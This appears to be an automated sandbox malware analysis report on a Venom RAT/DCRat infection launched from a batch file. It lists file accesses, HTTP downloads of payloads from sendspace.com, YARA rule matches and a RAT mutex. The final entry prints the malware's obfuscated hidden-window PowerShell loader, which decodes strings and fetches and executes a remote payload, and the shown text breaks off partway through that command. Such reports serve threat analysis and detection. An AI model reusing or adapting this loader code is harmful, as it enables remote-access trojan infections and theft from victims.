Source: |
Binary string: m.Core.pdb source: powershell.exe, 00000006.00000002.2443760561.0000000007473000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000006.00000002.2443760561.00000000074E0000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: ion.pdb source: powershell.exe, 00000006.00000002.2443760561.0000000007450000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: m.Core.pdbL source: powershell.exe, 00000006.00000002.2443760561.0000000007473000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: em.Core.pdbk source: powershell.exe, 00000006.00000002.2443760561.0000000007450000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: em.Core.pdb source: powershell.exe, 00000006.00000002.2443760561.0000000007450000.00000004.00000020.00020000.00000000.sdmp |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Users\user |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Users\user\AppData\Roaming\Microsoft |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Users\user\AppData\Roaming |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Users\user\AppData |
Jump to behavior |
Source: global traffic |
HTTP traffic detected: GET /pro/dl/7yi2fu HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /dlpro/c40ece74e11005d648325f5972143ae4/664f924b/7yi2fu/Jordbrets243.sea HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: fs03n4.sendspace.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /pro/dl/lt00vw HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /dlpro/9b8d52bb1f23ea7f2c058fa6bd7b21b2/664f926d/lt00vw/jXoEkwyvRCuipiJXijfHFGP97.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: fs03n3.sendspace.comConnection: Keep-AliveCookie: SID=ns2pmla9s88ipijkujilaccdr6 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: global traffic |
HTTP traffic detected: GET /pro/dl/7yi2fu HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /dlpro/c40ece74e11005d648325f5972143ae4/664f924b/7yi2fu/Jordbrets243.sea HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: fs03n4.sendspace.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /pro/dl/lt00vw HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /dlpro/9b8d52bb1f23ea7f2c058fa6bd7b21b2/664f926d/lt00vw/jXoEkwyvRCuipiJXijfHFGP97.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: fs03n3.sendspace.comConnection: Keep-AliveCookie: SID=ns2pmla9s88ipijkujilaccdr6 |
Source: powershell.exe, 00000006.00000002.2437943823.0000000002F57000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.microsoft |
Source: wab.exe, 00000009.00000002.3240674366.000000000541F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2790829519.000000000541F000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab |
Source: wab.exe, 00000009.00000002.3260501596.0000000022F90000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enc |
Source: powershell.exe, 00000003.00000002.2527053630.0000027ADB5BE000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://fs03n4.sendspace.com |
Source: powershell.exe, 00000003.00000002.2595939938.0000027AE9843000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2441971801.0000000005D6A000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000006.00000002.2438796376.0000000004E5D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000003.00000002.2527053630.0000027AD97D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2438796376.0000000004D01000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000002.3255609581.0000000020F51000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000002.3255609581.0000000021114000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000006.00000002.2438796376.0000000004E5D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000003.00000002.2607346916.0000027AF1971000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://www.microsoft. |
Source: powershell.exe, 00000003.00000002.2527053630.0000027ADB586000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.sendspace.com |
Source: powershell.exe, 00000003.00000002.2527053630.0000027AD97D1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000006.00000002.2438796376.0000000004D01000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6lB |
Source: powershell.exe, 00000006.00000002.2441971801.0000000005D6A000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000006.00000002.2441971801.0000000005D6A000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000006.00000002.2441971801.0000000005D6A000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: wab.exe, 00000009.00000003.2435277716.0000000005437000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.3240674366.000000000541F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2790829519.000000000541F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2422890302.0000000005437000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://fs03n3.sendspace.com/ |
Source: wab.exe, 00000009.00000003.2422890302.0000000005437000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://fs03n3.sendspace.com/2 |
Source: wab.exe, 00000009.00000003.2422890302.0000000005437000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2790829519.000000000540D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.3240674366.000000000540E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://fs03n3.sendspace.com/dlpro/9b8d52bb1f23ea7f2c058fa6bd7b21b2/664f926d/lt00vw/jXoEkwyvRCuipiJX |
Source: wab.exe, 00000009.00000003.2422890302.0000000005437000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://fs03n3.sendspace.com/om:443 |
Source: powershell.exe, 00000003.00000002.2527053630.0000027ADB5AB000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://fs03n4.sendspaX |
Source: powershell.exe, 00000003.00000002.2527053630.0000027ADB5AB000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://fs03n4.sendspace.com |
Source: powershell.exe, 00000003.00000002.2527053630.0000027AD9C64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2527053630.0000027AD9C60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2527053630.0000027ADB5AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2527053630.0000027ADB5A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2527053630.0000027ADB586000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://fs03n4.sendspace.com/dlpro/c40ece74e11005d648325f5972143ae4/664f924b/7yi2fu/Jordbrets243.sea |
Source: powershell.exe, 00000003.00000002.2527053630.0000027AD9C64000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://fs03n4.sendspace.comX |
Source: powershell.exe, 00000006.00000002.2438796376.0000000004E5D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000003.00000002.2527053630.0000027ADAC36000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000003.00000002.2595939938.0000027AE9843000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2441971801.0000000005D6A000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000003.00000002.2527053630.0000027AD99FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2527053630.0000027ADB097000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.sendspace.com |
Source: wab.exe, 00000009.00000002.3240609884.00000000053C8000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.sendspace.com/ |
Source: powershell.exe, 00000003.00000002.2527053630.0000027AD99FD000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.sendspace.com/pro/dl/7yi2fuP |
Source: powershell.exe, 00000006.00000002.2438796376.0000000004E5D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.sendspace.com/pro/dl/7yi2fuXR |
Source: wab.exe, 00000009.00000002.3251440257.0000000020560000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2422890302.0000000005430000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2790829519.000000000540D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.3240674366.000000000540E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.sendspace.com/pro/dl/lt00vw |
Source: wab.exe, 00000009.00000003.2790829519.000000000540D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.3240674366.000000000540E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.sendspace.com/pro/dl/lt00vw5 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49705 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49704 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 62797 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 62796 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49705 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49704 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 62796 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 62797 |
Source: amsi32_7056.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: dump.pcap, type: PCAP |
Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown |
Source: 00000009.00000002.3255609581.0000000020F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown |
Source: 00000009.00000002.3255609581.0000000021160000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown |
Source: 00000009.00000002.3240609884.00000000053C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown |
Source: 00000009.00000002.3260501596.0000000022F90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown |
Source: Process Memory Space: powershell.exe PID: 6100, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 7056, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: wab.exe PID: 6120, type: MEMORYSTR |
Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 3_2_00007FF848F1B8C2 |
3_2_00007FF848F1B8C2 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 3_2_00007FF848F1AB16 |
3_2_00007FF848F1AB16 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 9_2_024CC298 |
9_2_024CC298 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 9_2_024C7610 |
9_2_024C7610 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 9_2_024C7EE0 |
9_2_024C7EE0 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 9_2_024C1D98 |
9_2_024C1D98 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 9_2_024C72C8 |
9_2_024C72C8 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 9_2_024C2510 |
9_2_024C2510 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 9_2_024C1D50 |
9_2_024C1D50 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 9_2_024C1D87 |
9_2_024C1D87 |
Source: amsi32_7056.amsi.csv, type: OTHER |
Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution |
Source: dump.pcap, type: PCAP |
Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12 |
Source: 00000009.00000002.3255609581.0000000020F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12 |
Source: 00000009.00000002.3255609581.0000000021160000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12 |
Source: 00000009.00000002.3240609884.00000000053C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12 |
Source: 00000009.00000002.3260501596.0000000022F90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12 |
Source: Process Memory Space: powershell.exe PID: 6100, type: MEMORYSTR |
Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution |
Source: Process Memory Space: powershell.exe PID: 7056, type: MEMORYSTR |
Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution |
Source: Process Memory Space: wab.exe PID: 6120, type: MEMORYSTR |
Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Mutant created: NULL |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Venom_RAT_HVNC_Mutex_Venom RAT_HVNC |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3552:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1864:120:WilError_03 |
Source: unknown |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\las.cmd" " |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Vanddraabes = 1;$Precautioning='Sub';$Precautioning+='strin';$Precautioning+='g';Function Forfladigelsens($Tusmrkets152){$Tsp=$Tusmrkets152.Length-$Vanddraabes;For($velours=5;$velours -lt $Tsp;$velours+=6){$Ventin+=$Tusmrkets152.$Precautioning.Invoke( $velours, $Vanddraabes);}$Ventin;}function Inddatafiler223($Dorathea){. ($Rull) ($Dorathea);}$Gianthood=Forfladigelsens ' Ame.MBirtho terszunchaiEnepilSynkrlReassaGasco/ Pan,5Gub.e. Stat0Sjlen Stab,(Tilh,WGod eiVilstn kompd UndeoSalpiwH lhes Symp G njaNSp,ciTReam. maal1genne0matem.Euro,0 Norm;Hed,s HjnelW iegfiPneu n Opfl6Preim4induk;Cleis unc,nxDecon6 Glob4Unbra;Stutt Krsenr.ybbjvMatri:Tende1F rku2 Lejl1Under.Impu.0Gy,ur)ordre redepGRela.eStaalc rofokB,nhao Cart/Cy ni2.ubdi0Ag ic1.emix0Re.ie0Myrmi1Under0 yndi1 Lyst AnticF UnshiSylphrur.nvePhotof Te to Akkox Stup/Pleje1 Purc2 Cela1Ko,me.Enarb0,orca ';$Varmepudes=Forfladigelsens ' ammeUDelitsWatere.ejdsrDemon- UnreALeap gHennee UltrnIrreftLandb ';$Radernes=Forfladigelsens 'SpildhKrsustSotadtPreinp ,lamsTillb:Satis/ Gust/Shamew mergwHierowGend..Scia s ResyeReinfn IndkdQueevsDdsdopE cepaevangcGyptoeErnri.OffercUnf.ioOv.rbmBrugs/VandepUnf lrLsri.oSubst/Censud Prehl.arak/Mccar7LinalyRdkriiUnpe,2Se,vif Dewwu ety ';$Koglespillets=Forfladigelsens 'Flyvn>Overb ';$Rull=Forfladigelsens 'K emsiTvilleCampbxmodul ';$Hvervende='Limpindene';$Bondages = Forfladigelsens 'Forvae,uculcPredohmar,no Stan Hande%hvidvaTrio,pCampsp Unt dwhupoa ,ntetSprudaHyper% ieth\Te,tiPAnstrrRestaeTysseaSyconfNyklaf FdeaiSecanrOksekmPicayaB,saat TubeiAttrivMunkeeMadag.OvercSUndeppLapidoK.pit Dulge&Dimme& Betu Aabene ViolcSaumohzenogoCh,pp Godl,tRyota ';Inddatafiler223 (Forfladigelsens 'Ant a$SandwgFac,il,rojeo anaabTrskeaBilfrl Nons:Chl,rT Un,erEjakuoVed umMissolMatche U.denCircudL.lyaeOpsam= Ufor(B.ligcSmudsmfortidBalka Oligo/Skri.c ,ype Krysa$ gejrBTriano.enkrnUaf jdSiph.aAltingAegereGenfosFlip,)Densi ');Inddatafiler223 (Forfladigelsens ' Ena $F ralgForlalStenloBryggb Nonea Un,tlHokus:RanomU udennCreatf UdmuoUdr drDiatokE,dkkeP,eendNmousnAz,cyeSaftfsV.llasS.ces= A.pr$HaspeRFj.rnaSlui.d KommeUnd,frFillin Tubie Sttts Afde.UnhelsMn.dep Ano lTilreiC rpotReflu(orgia$ StjeKCorreosyningKateglBade eLavtrsApporpR.turiHydrolherrel ,apoeExemptInrolsDinos)A ato ');$Radernes=$Unforkedness[0];$Yojuane= (Forfladigelsens '.irma$DissogIndfjl BordoForfebUnconaDonn l |